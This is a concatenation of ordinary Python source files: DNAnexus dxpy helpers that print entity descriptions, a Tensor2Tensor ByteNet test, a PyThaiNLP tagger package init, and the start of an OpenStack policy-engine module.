    print_field("Created", render_timestamp(desc['created']))
    print_field("Last modified", render_timestamp(desc['modified']))
    print_field("Created from", desc["applet"])
    print_json_field('Installed', desc['installed'])
    print_json_field('Open source', desc['openSource'])
    print_json_field('Deleted', desc['deleted'])
    if not desc['deleted']:
        advanced_inputs = []
        details = desc["details"]
        if isinstance(details, dict) and "advancedInputs" in details:
            if not verbose:
                advanced_inputs = details["advancedInputs"]
            del details["advancedInputs"]

        if 'published' not in desc or desc["published"] < 0:
            print_field("Published", "-")
        else:
            print_field("Published", render_timestamp(desc['published']))
        if "title" in desc and desc['title'] is not None:
            print_field("Title", desc["title"])
        if "subtitle" in desc and desc['subtitle'] is not None:
            print_field("Subtitle", desc["subtitle"])
        if 'summary' in desc and desc['summary'] is not None:
            print_field("Summary", desc['summary'])
        print_list_field("Categories", desc["categories"])
        if 'details' in desc:
            print_json_field("Details", desc["details"])
        print_json_field("Access", desc["access"])
        print_field("API version", desc["dxapi"])
        if 'inputSpec' in desc:
            print_nofill_field("Input Spec", get_io_spec(desc["inputSpec"], skip_fields=advanced_inputs))
            print_nofill_field("Output Spec", get_io_spec(desc["outputSpec"]))
            print_field("Interpreter", desc["runSpec"]["interpreter"])
            if "resources" in desc["runSpec"]:
                print_json_field("Resources", desc["runSpec"]["resources"])
            if "bundledDepends" in desc["runSpec"]:
                print_list_field("bundledDepends", render_bundleddepends(desc["runSpec"]["bundledDepends"]))
            if "execDepends" in desc["runSpec"]:
                print_list_field("execDepends", render_execdepends(desc["runSpec"]["execDepends"]))
            if "systemRequirements" in desc['runSpec']:
                print_json_field('Sys Requirements', desc['runSpec']['systemRequirements'])
        if 'resources' in desc:
            print_field("Resources", desc['resources'])
    if 'installs' in desc:
        print_field('# Installs', str(desc['installs']))
    if 'authorizedUsers' in desc:
        print_list_field('AuthorizedUsers', desc["authorizedUsers"])

    for field in desc:
        if field not in recognized_fields:
            print_json_field(field, desc[field])

def print_globalworkflow_desc(desc, verbose=False):
    recognized_fields = ['id', 'class', 'name', 'version', 'aliases', 'createdBy', 'created',
                         'modified', 'deleted', 'published', 'title', 'description',
                         'categories', 'dxapi', 'billTo', 'summary', 'billing', 'developerNotes',
                         'authorizedUsers', 'regionalOptions']
    is_locked_workflow = False
    print_field("ID", desc["id"])
    print_field("Class", desc["class"])
    if 'billTo' in desc:
        print_field("Billed to", desc['billTo'][5 if desc['billTo'].startswith('user-') else 0:])
    print_field("Name", desc["name"])
    print_field("Version", desc["version"])
    print_list_field("Aliases", desc["aliases"])
    print_field("Created by", desc["createdBy"][5 if desc['createdBy'].startswith('user-') else 0:])
    print_field("Created", render_timestamp(desc['created']))
    print_field("Last modified", render_timestamp(desc['modified']))
    # print_json_field('Open source', desc['openSource'])
    print_json_field('Deleted', desc.get('deleted', False))
    if not desc.get('deleted', False):
        if 'published' not in desc or desc["published"] < 0:
            print_field("Published", "-")
        else:
            print_field("Published", render_timestamp(desc['published']))
        if "title" in desc and desc['title'] is not None:
            print_field("Title", desc["title"])
        if "subtitle" in desc and desc['subtitle'] is not None:
            print_field("Subtitle", desc["subtitle"])
        if 'summary' in desc and desc['summary'] is not None:
            print_field("Summary", desc['summary'])
        print_list_field("Categories", desc["categories"])
        if 'details' in desc:
            print_json_field("Details", desc["details"])
        print_field("API version", desc["dxapi"])

        # Additionally, print inputs, outputs, stages of the underlying workflow
        # from the region of the current workspace
        current_project = dxpy.WORKSPACE_ID
        if current_project:
            region = dxpy.api.project_describe(current_project, input_params={"fields": {"region": True}})["region"]
            if region and region in desc['regionalOptions']:
                workflow_desc = desc['regionalOptions'][region]['workflowDescribe']
                print_field("Workflow region", region)
                if 'id' in workflow_desc:
                    print_field("Workflow ID", workflow_desc['id'])
                if workflow_desc.get('inputSpec') is not None and workflow_desc.get('inputs') is None:
                    print_nofill_field("Input Spec", get_io_spec(workflow_desc['inputSpec'], skip_fields=get_advanced_inputs(workflow_desc, verbose)))
                if workflow_desc.get('outputSpec') is not None and workflow_desc.get('outputs') is None:
                    print_nofill_field("Output Spec", get_io_spec(workflow_desc['outputSpec']))
                if  workflow_desc.get('inputs') is not None:
                    is_locked_workflow = True
                    print_nofill_field("Workflow Inputs", get_io_spec(workflow_desc['inputs']))
                if  workflow_desc.get('outputs') is not None:
                    print_nofill_field("Workflow Outputs", get_io_spec(workflow_desc['outputs']))
                if 'stages' in workflow_desc:
                    for i, stage in enumerate(workflow_desc["stages"]):
                        render_stage("Stage " + str(i), stage)
    if 'authorizedUsers' in desc:
        print_list_field('AuthorizedUsers', desc["authorizedUsers"])

    if is_locked_workflow:
        print_locked_workflow_note()

    for field in desc:
        if field not in recognized_fields:
            print_json_field(field, desc[field])

def get_col_str(col_desc):
    return col_desc['name'] + DELIMITER(" (") + col_desc['type'] + DELIMITER(")")

def print_data_obj_desc(desc, verbose=False):
    recognized_fields = ['id', 'class', 'project', 'folder', 'name', 'properties', 'tags', 'types', 'hidden', 'details', 'links', 'created', 'modified', 'state', 'title', 'subtitle', 'description', 'inputSpec', 'outputSpec', 'runSpec', 'summary', 'dxapi', 'access', 'createdBy', 'summary', 'sponsored', 'developerNotes',
                         'stages', 'inputs', 'outputs', 'latestAnalysis', 'editVersion', 'outputFolder', 'initializedFrom', 'temporary']

    is_locked_workflow = False
    print_field("ID", desc["id"])
    print_field("Class", desc["class"])
    if 'project' in desc:
        print_field("Project", desc['project'])
    if 'folder' in desc:
        print_field("Folder", desc["folder"])
    print_field("Name", desc["name"])
    if 'state' in desc:
        print_field("State", DATA_STATES(desc['state']))
    if 'hidden' in desc:
        print_field("Visibility", ("hidden" if desc["hidden"] else "visible"))
    if 'types' in desc:
        print_list_field("Types", desc['types'])
    if 'properties' in desc:
        print_list_field("Properties", ['='.join([k, v]) for k, v in desc['properties'].items()])
    if 'tags' in desc:
        print_list_field("Tags", desc['tags'])
    if verbose and 'details' in desc:
        print_json_field("Details", desc["details"])
    if 'links' in desc:
        print_list_field("Outgoing links", desc['links'])
    print_field("Created", render_timestamp(desc['created']))
    if 'createdBy' in desc:
        print_field("Created by", desc['createdBy']['user'][5:])
        if 'job' in desc["createdBy"]:
            print_field(" via the job", desc['createdBy']['job'])
            if verbose and 'executable' in desc['createdBy']:
                print_field(" running", desc['createdBy']['executable'])
    print_field("Last modified", render_timestamp(desc['modified']))
    if "editVersion" in desc:
        print_field("Edit Version", str(desc['editVersion']))
    if "title" in desc:
        print_field("Title", desc["title"])
    if "subtitle" in desc:
        print_field("Subtitle", desc["subtitle"])
    if 'summary' in desc:
        print_field("Summary", desc['summary'])
    if 'description' in desc and verbose:
        print_field("Description", desc["description"])
    if 'outputFolder' in desc:
        print_field("Output Folder", desc["outputFolder"] if desc["outputFolder"] is not None else "-")
    if 'access' in desc:
        print_json_field("Access", desc["access"])
    if 'dxapi' in desc:
        print_field("API version", desc["dxapi"])

    # In case of a workflow: do not display "Input/Output Specs" that show stages IO
    # when the workflow has workflow-level input/output fields defined.
    if desc.get('inputSpec') is not None and desc.get('inputs') is None:
        print_nofill_field("Input Spec", get_io_spec(desc['inputSpec'], skip_fields=get_advanced_inputs(desc, verbose)))
    if desc.get('outputSpec') is not None and desc.get('outputs') is None:
        print_nofill_field("Output Spec", get_io_spec(desc['outputSpec']))
    if  desc.get('inputs') is not None:
        is_locked_workflow = True
        print_nofill_field("Workflow Inputs", get_io_spec(desc['inputs']))
    if  desc.get('outputs') is not None:
        print_nofill_field("Workflow Outputs", get_io_spec(desc['outputs']))

    if 'runSpec' in desc:
        print_field("Interpreter", desc["runSpec"]["interpreter"])
        if "resources" in desc['runSpec']:
            print_json_field("Resources", desc["runSpec"]["resources"])
        if "bundledDepends" in desc["runSpec"]:
            print_list_field("bundledDepends", render_bundleddepends(desc["runSpec"]["bundledDepends"]))
        if "execDepends" in desc["runSpec"]:
            print_list_field("execDepends", render_execdepends(desc["runSpec"]["execDepends"]))
        if "systemRequirements" in desc['runSpec']:
            print_json_field('Sys Requirements', desc['runSpec']['systemRequirements'])
    if 'stages' in desc:
        for i, stage in enumerate(desc["stages"]):
            render_stage("Stage " + str(i), stage)
    if 'initializedFrom' in desc:
        print_field("initializedFrom", desc["initializedFrom"]["id"])
    if 'latestAnalysis' in desc and desc['latestAnalysis'] is not None:
        print_field("Last execution", desc["latestAnalysis"]["id"])
        print_field("  run at", render_timestamp(desc["latestAnalysis"]["created"]))
        print_field("  state", JOB_STATES(desc["latestAnalysis"]["state"]))

    for field in desc:
        if field in recognized_fields:
            continue
        else:
            if field == "media":
                print_field("Media type", desc['media'])
            elif field == "size":
                if desc["class"] == "file":
                    sponsored_str = ""
                    if 'sponsored' in desc and desc['sponsored']:
                        sponsored_str = DELIMITER(", ") + "sponsored by DNAnexus"
                    print_field("Size", get_size_str(desc['size']) + sponsored_str)
                else:
                    print_field("Size", str(desc['size']))
            elif field == "length":
                print_field("Length", str(desc['length']))
            elif field == "columns":
                if len(desc['columns']) > 0:
                    coldescs = "Columns" + DELIMITER(" " *(16-len("Columns"))) + get_col_str(desc["columns"][0])
                    for column in desc["columns"][1:]:
                        coldescs += '\n' + DELIMITER(" "*16) + get_col_str(column)
                    print(coldescs)
                else:
                    print_list_field("Columns", desc['columns'])
            else: # Unhandled prettifying
                print_json_field(field, desc[field])

    if is_locked_workflow:
        print_locked_workflow_note()

def printable_ssh_host_key(ssh_host_key):
    try:
        keygen = subprocess.Popen(["ssh-keygen", "-lf", "/dev/stdin"], stdin=subprocess.PIPE, stdout=subprocess.PIPE)
        if USING_PYTHON2:
            (stdout, stderr) = keygen.communicate(ssh_host_key)
        else:
            (stdout, stderr) = keygen.communicate(ssh_host_key.encode())
    except:
        return ssh_host_key.strip()
    else:
        if not USING_PYTHON2:
            stdout =  stdout.decode()
        return stdout.replace(" no comment", "").strip()


def print_execution_desc(desc):
    recognized_fields = ['id', 'class', 'project', 'workspace', 'region',
                         'app', 'applet', 'executable', 'workflow',
                         'state',
                         'rootExecution', 'parentAnalysis', 'parentJob', 'originJob', 'analysis', 'stage',
                         'function', 'runInput', 'originalInput', 'input', 'output', 'folder', 'launchedBy', 'created',
                         'modified', 'failureReason', 'failureMessage', 'stdout', 'stderr', 'waitingOnChildren',
                         'dependsOn', 'resources', 'projectCache', 'details', 'tags', 'properties',
                         'name', 'instanceType', 'systemRequirements', 'executableName', 'failureFrom', 'billTo',
                         'startedRunning', 'stoppedRunning', 'stateTransitions',
                         'delayWorkspaceDestruction', 'stages', 'totalPrice', 'isFree', 'invoiceMetadata',
                         'priority', 'sshHostKey']

    print_field("ID", desc["id"])
    print_field("Class", desc["class"])
    if "name" in desc and desc['name'] is not None:
        print_field("Job name", desc['name'])
    if "executableName" in desc and desc['executableName'] is not None:
        print_field("Executable name", desc['executableName'])
    print_field("Project context", desc["project"])
    if 'region' in desc:
        print_field("Region", desc["region"])
    if 'billTo' in desc:
        print_field("Billed to",  desc['billTo'][5 if desc['billTo'].startswith('user-') else 0:])
    if 'workspace' in desc:
        print_field("Workspace", desc["workspace"])
    if 'projectCache' in desc:
        print_field('Cache workspace', desc['projectCache'])
        print_field('Resources', desc['resources'])
    if "app" in desc:
        print_field("App", desc["app"])
    elif desc.get("executable", "").startswith("globalworkflow"):
        print_field("Workflow", desc["executable"])
    elif "applet" in desc:
        print_field("Applet", desc["applet"])
    elif "workflow" in desc:
        print_field("Workflow", desc["workflow"]["id"])
    if "instanceType" in desc and desc['instanceType'] is not None:
        print_field("Instance Type", desc["instanceType"])
    if "priority" in desc:
        print_field("Priority", desc["priority"])
    print_field("State", JOB_STATES(desc["state"]))
    if "rootExecution" in desc:
        print_field("Root execution", desc["rootExecution"])
    if "originJob" in desc:
        if desc["originJob"] is None:
            print_field("Origin job", "-")
        else:
            print_field("Origin job", desc["originJob"])
    if desc["parentJob"] is None:
        print_field("Parent job", "-")
    else:
        print_field("Parent job", desc["parentJob"])
    if "parentAnalysis" in desc:
        if desc["parentAnalysis"] is not None:
            print_field("Parent analysis", desc["parentAnalysis"])
    if "analysis" in desc and desc["analysis"] is not None:
        print_field("Analysis", desc["analysis"])
        print_field("Stage", desc["stage"])
    if "stages" in desc:
        for i, (stage, analysis_stage) in enumerate(zip(desc["workflow"]["stages"], desc["stages"])):
            stage['execution'] = analysis_stage['execution']
            render_stage("Stage " + str(i), stage, as_stage_of=desc["id"])
    if "function" in desc:
        print_field("Function", desc["function"])
    if 'runInput' in desc:
        default_fields = {k: v for k, v in desc["originalInput"].items() if k not in desc["runInput"]}
        print_nofill_field("Input", get_io_field(desc["runInput"], defaults=default_fields))
    else:
        print_nofill_field("Input", get_io_field(desc["originalInput"]))
    resolved_jbors = {}
    input_with_jbors = desc.get('runInput', desc['originalInput'])
    for k in desc["input"]:
        if k in input_with_jbors and desc["input"][k] != input_with_jbors[k]:
            get_resolved_jbors(desc["input"][k], input_with_jbors[k], resolved_jbors)
    if len(resolved_jbors) != 0:
        print_nofill_field("Resolved JBORs", get_io_field(resolved_jbors, delim=(GREEN() + '=>' + ENDC())))
    print_nofill_field("Output", get_io_field(desc["output"]))
    if 'folder' in desc:
        print_field('Output folder', desc['folder'])
    print_field("Launched by", desc["launchedBy"][5:])
    print_field("Created", render_timestamp(desc['created']))
    if 'startedRunning' in desc:
        if 'stoppedRunning' in desc:
            print_field("Started running", render_timestamp(desc['startedRunning']))
        else:
            print_field("Started running", "{t} (running for {rt})".format(t=render_timestamp(desc['startedRunning']),
                rt=datetime.timedelta(seconds=int(time.time())-desc['startedRunning']//1000)))
    if 'stoppedRunning' in desc:
        print_field("Stopped running", "{t} (Runtime: {rt})".format(
            t=render_timestamp(desc['stoppedRunning']),
            rt=datetime.timedelta(seconds=(desc['stoppedRunning']-desc['startedRunning'])//1000)))
    if desc.get('class') == 'analysis' and 'stateTransitions' in desc and desc['stateTransitions']:
        # Display finishing time of the analysis if available
        if desc['stateTransitions'][-1]['newState'] in ['done', 'failed', 'terminated']:
            print_field("Finished", "{t} (Wall-clock time: {wt})".format(
                t=render_timestamp(desc['stateTransitions'][-1]['setAt']),
                wt=datetime.timedelta(seconds=(desc['stateTransitions'][-1]['setAt']-desc['created'])//1000)))
    print_field("Last modified", render_timestamp(desc['modified']))
    if 'waitingOnChildren' in desc:
        print_list_field('Pending subjobs', desc['waitingOnChildren'])
    if 'dependsOn' in desc:
        print_list_field('Depends on', desc['dependsOn'])
    if "failureReason" in desc:
        print_field("Failure reason", desc["failureReason"])
    if "failureMessage" in desc:
        print_field("Failure message", desc["failureMessage"])
    if "failureFrom" in desc and desc['failureFrom'] is not None and desc['failureFrom']['id'] != desc['id']:
        print_field("Failure is from", desc['failureFrom']['id'])
    if 'systemRequirements' in desc:
        print_json_field("Sys Requirements", desc['systemRequirements'])
    if "tags" in desc:
        print_list_field("Tags", desc["tags"])
    if "properties" in desc:
        print_list_field("Properties", [key + '=' + value for key, value in desc["properties"].items()])
    if "details" in desc and "clonedFrom" in desc["details"]:
        cloned_hash = desc["details"]["clonedFrom"]
        if "id" in cloned_hash:
            print_field("Re-run of", cloned_hash["id"])
            print_field(" named", cloned_hash["name"])

            same_executable = cloned_hash["executable"] == desc.get("applet", desc.get("app", ""))
            print_field(" using", ("" if same_executable else YELLOW()) + \
                            cloned_hash["executable"] + \
                            (" (same)" if same_executable else ENDC()))
            same_project = cloned_hash["project"] == desc["project"]
            same_folder = cloned_hash["folder"] == desc["folder"] or not same_project
            print_field(" output folder", ("" if same_project else YELLOW()) + \
                            cloned_hash["project"] + \
                            ("" if same_project else ENDC()) + ":" + \
                            ("" if same_folder else YELLOW()) + \
                            cloned_hash["folder"] + \
                            (" (same)" if (same_project and same_folder) else "" if same_folder else ENDC()))
            different_inputs = []
            for item in cloned_hash["runInput"]:
                if cloned_hash["runInput"][item] != desc["runInput"][item]:
                    different_inputs.append(item)
            print_nofill_field(" input", get_io_field(cloned_hash["runInput"], highlight_fields=different_inputs))

            cloned_sys_reqs = cloned_hash.get("systemRequirements")
            if isinstance(cloned_sys_reqs, dict):
                if cloned_sys_reqs == desc.get('systemRequirements'):
                    print_nofill_field(" sys reqs", json.dumps(cloned_sys_reqs) + ' (same)')
                else:
                    print_nofill_field(" sys reqs", YELLOW() + json.dumps(cloned_sys_reqs) + ENDC())
    if not desc.get('isFree') and desc.get('totalPrice') is not None:
        print_field('Total Price', format_currency(desc['totalPrice'], meta=desc['currency']))
    if desc.get('invoiceMetadata'):
        print_json_field("Invoice Metadata", desc['invoiceMetadata'])
    if desc.get('sshHostKey'):
        print_nofill_field("SSH Host Key", printable_ssh_host_key(desc['sshHostKey']))

    for field in desc:
        if field not in recognized_fields:
            print_json_field(field, desc[field])


def locale_from_currency_code(dx_code):
    """
    This is a (temporary) hardcoded mapping between currency_list.json in nucleus and standard
    locale string useful for further formatting

    :param dx_code: An id of nucleus/commons/pricing_models/currency_list.json collection
    :return: standardised locale, eg 'en_US'; None when no mapping found
    """
    currency_locale_map = {0: 'en_US', 1: 'en_GB'}
    return currency_locale_map[dx_code] if dx_code in currency_locale_map else None


def format_currency_from_meta(value, meta):
    """
    Formats currency value into properly decorated currency string based on provided currency metadata.
    Please note that this is very basic solution missing some of the localisation features (such as
    negative symbol position and type.

    Better option is to use 'locale' module to reflect currency string decorations more accurately.

    See 'format_currency'

    :param value:
    :param meta:
    :return:
    """
    prefix = '-' if value < 0 else ''  # .. TODO: some locales position neg symbol elsewhere, missing meta
    prefix += meta['symbol'] if meta['symbolPosition'] == 'left' else ''
    suffix = ' %s' % meta["symbol"] if meta['symbolPosition'] == 'right' else ''
    # .. TODO: take the group and decimal separators from meta into account (US & UK are the same, so far we're safe)
    formatted_value = '{:,.2f}'.format(abs(value))
    return prefix + formatted_value + suffix


def format_currency(value, meta, currency_locale=None):
    """
    Formats currency value into properly decorated currency string based on either locale (preferred)
    or if that is not available then currency metadata. Until locale is provided from the server
    a crude mapping between `currency.dxCode` and a locale string is used instead (eg 0: 'en_US')

    :param value: amount
    :param meta: server metadata (`currency`)
    :return: formatted currency string
    """
    try:
        if currency_locale is None:
            currency_locale = locale_from_currency_code(meta['dxCode'])
        if currency_locale is None:
            return format_currency_from_meta(value, meta)
        else:
            locale.setlocale(locale.LC_ALL, currency_locale)
            return locale.currency(value, grouping=True)
    except locale.Error:
        # .. locale is probably not available -> fallback to format manually
        return format_currency_from_meta(value, meta)


def print_user_desc(desc):
    print_field("ID", desc["id"])
    print_field("Name", desc["first"] + " " + ((desc["middle"] + " ") if desc["middle"] != '' else '') + desc["last"])
    if "email" in desc:
        print_field("Email", desc["email"])

    bill_to_label = "Default bill to"
    if "billTo" in desc:
        print_field(bill_to_label, desc["billTo"])

    if "appsInstalled" in desc:
        print_list_field("Apps installed", desc["appsInstalled"])

def print_generic_desc(desc):
    for field in desc:
        print_json_field(field, desc[field])

def print_desc(desc, verbose=False):
    '''
    :param desc: The describe hash of a DNAnexus entity
    :type desc: dict

    Depending on the class of the entity, this method will print a
    formatted and human-readable string containing the data in *desc*.
    '''
    if desc['class'] in ['project', 'workspace', 'container']:
        print_project_desc(desc, verbose=verbose)
    elif desc['class'] == 'app':
        print_app_desc(desc, verbose=verbose)
    elif desc['class'] == 'globalworkflow':
        print_globalworkflow_desc(desc, verbose=verbose)
    elif desc['class'] in ['job', 'analysis']:
        print_execution_desc(desc)
    elif desc['class'] == 'user':
        print_user_desc(desc)
    elif desc['class'] in ['org', 'team']:
        print_generic_desc(desc)
    else:
        print_data_obj_desc(desc, verbose=verbose)

def get_ls_desc(desc, print_id=False):
    addendum = ' : ' + desc['id'] if print_id is True else ''
    if desc['class'] in ['applet', 'workflow']:
        return BOLD() + GREEN() + desc['name'] + ENDC() + addendum
    else:
        return desc['name'] + addendum


def print_ls_desc(desc, **kwargs):
    print(get_ls_desc(desc, **kwargs))


def get_ls_l_header():
    return (BOLD() +
            'State' + DELIMITER('   ') +
            'Last modified' + DELIMITER('       ') +
            'Size' + DELIMITER('      ') +
            'Name' + DELIMITER(' (') +
            'ID' + DELIMITER(')') +
            ENDC())


def print_ls_l_header():
    print(get_ls_l_header())


def get_ls_l_desc_fields():
    return {
        'id': True,
        'class': True,
        'folder': True,
        'length': True,
        'modified': True,
        'name': True,
        'project': True,
        'size': True,
        'state': True
    }


def get_ls_l_desc(desc, include_folder=False, include_project=False):
    """
    desc must have at least all the fields given by get_ls_l_desc_fields.
    """
    # If you make this method consume an additional field, you must add it to
    # get_ls_l_desc_fields above.
    if 'state' in desc:
        state_len = len(desc['state'])
        if desc['state'] != 'closed':
            state_str = YELLOW() + desc['state'] + ENDC()
        else:
            state_str = GREEN() + desc['state'] + ENDC()
    else:
        state_str = ''
        state_len = 0

    name_str = ''
    if include_folder:
        name_str += desc['folder'] + ('/' if desc['folder'] != '/' else '')

    name_str += desc['name']

    if desc['class'] in ['applet', 'workflow']:
        name_str = BOLD() + GREEN() + name_str + ENDC()

    size_str = ''
    if 'size' in desc and desc['class'] == 'file':
        size_str = get_size_str(desc['size'])
    elif 'length' in desc:
        size_str = str(desc['length']) + ' rows'
    size_padding = ' ' * max(0, 9 - len(size_str))

    return (state_str +
            DELIMITER(' '*(8 - state_len)) + render_short_timestamp(desc['modified']) +
            DELIMITER(' ') + size_str +
            DELIMITER(size_padding + ' ') + name_str +
            DELIMITER(' (') + ((desc['project'] + DELIMITER(':')) if include_project else '') + desc['id'] +
            DELIMITER(')'))


def print_ls_l_desc(desc, **kwargs):
    print(get_ls_l_desc(desc, **kwargs))


def get_find_executions_string(desc, has_children, single_result=False, show_outputs=True,
                               is_cached_result=False):
    '''
    :param desc: hash of execution's describe output
    :param has_children: whether the execution has children to be printed
    :param single_result: whether the execution is displayed as a single result or as part of an execution tree
    :param is_cached_result: whether the execution should be formatted as a cached result
    '''
    is_not_subjob = desc['parentJob'] is None or desc['class'] == 'analysis' or single_result
    result = ("* " if is_not_subjob and get_delimiter() is None else "")
    canonical_execution_name = desc['executableName']
    if desc['class'] == 'job':
        canonical_execution_name += ":" + desc['function']
    execution_name = desc.get('name', '<no name>')

    # Format the name of the execution
    if is_cached_result:
        result += BOLD() + "[" + ENDC()
    result += BOLD() + BLUE()
    if desc['class'] == 'analysis':
        result += UNDERLINE()
    result += execution_name + ENDC()

    if execution_name != canonical_execution_name and execution_name+":main" != canonical_execution_name:
        result += ' (' + canonical_execution_name + ')'

    if is_cached_result:
        result += BOLD() + "]" + ENDC()

    # Format state
    result += DELIMITER(' (') + JOB_STATES(desc['state']) + DELIMITER(') ') + desc['id']

    # Add unicode pipe to child if necessary
    result += DELIMITER('\n' + (u'│ ' if is_not_subjob and has_children else ("  " if is_not_subjob else "")))
    result += desc['launchedBy'][5:] + DELIMITER(' ')
    result += render_short_timestamp(desc['created'])

    cached_and_runtime_strs = []

    if is_cached_result:
        cached_and_runtime_strs.append(YELLOW() + "cached" + ENDC())

    if desc['class'] == 'job':
        # Only print runtime if it ever started running
        if desc.get('startedRunning'):
            if desc['state'] in ['done', 'failed', 'terminated', 'waiting_on_output']:
                runtime = datetime.timedelta(seconds=int(desc['stoppedRunning']-desc['startedRunning'])//1000)
                cached_and_runtime_strs.append("runtime " + str(runtime))
            elif desc['state'] == 'running':
                seconds_running = max(int(time.time()-desc['startedRunning']//1000), 0)
                msg = "running for {rt}".format(rt=datetime.timedelta(seconds=seconds_running))
                cached_and_runtime_strs.append(msg)

    if cached_and_runtime_strs:
        result += " (" + ", ".join(cached_and_runtime_strs) + ")"

    if show_outputs:
        prefix = DELIMITER('\n' + (u'│ ' if is_not_subjob and has_children else ("  " if is_not_subjob else "")))
        if desc.get("output") != None:
            result += job_output_to_str(desc['output'], prefix=prefix)
        elif desc['state'] == 'failed' and 'failureReason' in desc:
            result += prefix + BOLD() + desc['failureReason'] + ENDC() + ": " + fill(desc.get('failureMessage', ''),
                                                                                     subsequent_indent=prefix.lstrip('\n'))

    return result

def print_locked_workflow_note():
    print_field('Note',
                'This workflow has an explicit input specification (i.e. it is locked), and as such stage inputs cannot be modified at run-time.')

# coding=utf-8
# Copyright 2018 The Tensor2Tensor Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""ByteNet tests."""

from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np

from tensor2tensor.data_generators import problem_hparams
from tensor2tensor.models import bytenet

import tensorflow as tf


class ByteNetTest(tf.test.TestCase):

  def testByteNet(self):
    vocab_size = 9
    x = np.random.random_integers(1, high=vocab_size - 1, size=(3, 5, 1, 1))
    y = np.random.random_integers(1, high=vocab_size - 1, size=(3, 6, 1, 1))
    hparams = bytenet.bytenet_base()
    p_hparams = problem_hparams.test_problem_hparams(vocab_size, vocab_size)
    with self.test_session() as session:
      features = {
          "inputs": tf.constant(x, dtype=tf.int32),
          "targets": tf.constant(y, dtype=tf.int32),
      }
      model = bytenet.ByteNet(
          hparams, tf.estimator.ModeKeys.TRAIN, p_hparams)
      logits, _ = model(features)
      session.run(tf.global_variables_initializer())
      res = session.run(logits)
    self.assertEqual(res.shape, (3, 50, 1, 1, vocab_size))


if __name__ == "__main__":
  tf.test.main()

# -*- coding: utf-8 -*-
"""
Linguistic and other taggers.

Tagging each token in a sentence with supplementary information,
such as its part-of-speech (POS) tag, and named entity (NE) tag.
"""

__all__ = [
    "PerceptronTagger",
    "pos_tag",
    "pos_tag_sents",
    "tag_provinces",
    "chunk_parse",
    "NER",
]

from pythainlp.tag.locations import tag_provinces
from pythainlp.tag.pos_tag import pos_tag, pos_tag_sents
from pythainlp.tag._tag_perceptron import PerceptronTagger
from pythainlp.tag.chunk import chunk_parse
from pythainlp.tag.named_entity import NER

# vim: tabstop=4 shiftwidth=4 softtabstop=4

# Copyright (c) 2012 OpenStack Foundation.
# All Rights Reserved.
#
#    Licensed under the Apache License, Version 2.0 (the "License"); you may
#    not use this file except in compliance with the License. You may obtain
#    a copy of the License at
#
#         http://www.apache.org/licenses/LICENSE-2.0
#
#    Unless required by applicable law or agreed to in writing, software
#    distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
#    WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
#    License for the specific language governing permissions and limitations
#    under the License.

"""
Common Policy Engine Implementation

Policies can be expressed in one of two forms: A list of lists, or a
string written in the new policy language.

In the list-of-lists representation, each check inside the innermost
list is combined as with an "and" conjunction--for that check to pass,
all the specified checks must pass.  These innermost lists are then
combined as with an "or" conjunction.  This is the original way of
expressing policies, but there now exists a new way: the policy
language.

In the policy language, each check is specified the same way as in the
list-of-lists representation: a simple "a:b" pair that is matched to
the correct code to perform that check.  However, conjunction
operators are available, allowing for more expressiveness in crafting
policies.

As an example, take the following rule, expressed in the list-of-lists
representation::

    [["role:admin"], ["project_id:%(project_id)s", "role:projectadmin"]]

In the policy language, this becomes::

    role:admin or (project_id:%(project_id)s and role:projectadmin)

The policy language also has the "not" operator, allowing a richer
policy rule::

    project_id:%(project_id)s and not role:dunce

Finally, two special policy checks should be mentioned; the policy
check "@" will always accept an access, and the policy check "!" will
always reject an access.  (Note that if a rule is either the empty
list ("[]") or the empty string, this is equivalent to the "@" policy
check.)  Of these, the "!" policy check is probably the most useful,
as it allows particular rules to be explicitly disabled.
"""

import abc
import re
import urllib
import urllib2

from oslo.config import cfg
import six

from kwstandby.openstack.common import fileutils
from kwstandby.openstack.common.gettextutils import _
from kwstandby.openstack.common import jsonutils
from kwstandby.openstack.common import log as logging

policy_opts = [
    cfg.StrOpt('policy_file',
               default='policy.json',
               help=_('JSON file containing policy')),
    cfg.StrOpt('policy_default_rule',
               default='default',
               help=_('Rule enforced when requested rule is not found')),
]

CONF = cfg.CONF
CONF.register_opts(policy_opts)

LOG = logging.getLogger(__name__)

_checks = {}


class PolicyNotAuthorized(Exception):

    def __init__(self, rule):
        msg = _("Policy doesn't allow %s to be performed.") % rule
        super(PolicyNotAuthorized, self).__init__(msg)


class Rules(dict):
    """A store for rules. Handles the default_rule setting directly."""

    @classmethod
    def load_json(cls, data, default_rule=None):
        """Allow loading of JSON rule data."""

        # Suck in the JSON data and parse the rules
        rules = dict((k, parse_rule(v)) for k, v in
                     jsonutils.loads(data).items())

        return cls(rules, default_rule)

    def __init__(self, rules=None, default_rule=None):
        """Initialize the Rules store."""

        super(Rules, self).__init__(rules or {})
        self.default_rule = default_rule

    def __missing__(self, key):
        """Implements the default rule handling."""

        # If the default rule isn't actually defined, do something
        # reasonably intelligent
        if not self.default_rule or self.default_rule not in self:
            raise KeyError(key)

        return self[self.default_rule]

    def __str__(self):
        """Dumps a string representation of the rules."""

        # Start by building the canonical strings for the rules
        out_rules = {}
        for key, value in self.items():
            # Use empty string for singleton TrueCheck instances
            if isinstance(value, TrueCheck):
                out_rules[key] = ''
            else:
                out_rules[key] = str(value)

        # Dump a pretty-printed JSON representation
        return jsonutils.dumps(out_rules, indent=4)


class Enforcer(object):
    """Responsible for loading and enforcing rules.

    :param policy_file: Custom policy file to use, if none is
                        specified, `CONF.policy_file` will be
                        used.
    :param rules: Default dictionary / Rules to use. It will be
                  considered just in the first instantiation. If
                  `load_rules(True)`, `clear()` or `set_rules(True)`
                  is called this will be overwritten.
    :param default_rule: Default rule to use, CONF.default_rule will
                         be used if none is specified.
    """

    def __init__(self, policy_file=None, rules=None, default_rule=None):
        self.rules = Rules(rules)
        self.default_rule = default_rule or CONF.policy_default_rule

        self.policy_path = None
        self.policy_file = policy_file or CONF.policy_file

    def set_rules(self, rules, overwrite=True):
        """Create a new Rules object based on the provided dict of rules.

